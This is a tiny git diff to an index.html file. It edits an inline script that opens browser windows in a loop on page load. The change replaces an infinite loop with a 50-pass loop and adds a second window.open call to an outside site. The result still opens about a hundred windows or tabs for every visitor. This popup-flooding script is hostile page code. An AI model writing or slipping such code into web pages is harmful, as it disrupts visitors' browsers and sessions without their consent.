--- a/index.html
+++ b/index.html
@@ -1,5 +1,6 @@
 <script>
-while(1){
+for (var i = 0; i < 50; i++) {
   window.open("https://www.youtube.com/");
+  window.open("http://oss.jodi.org:80");
 }
 </script>
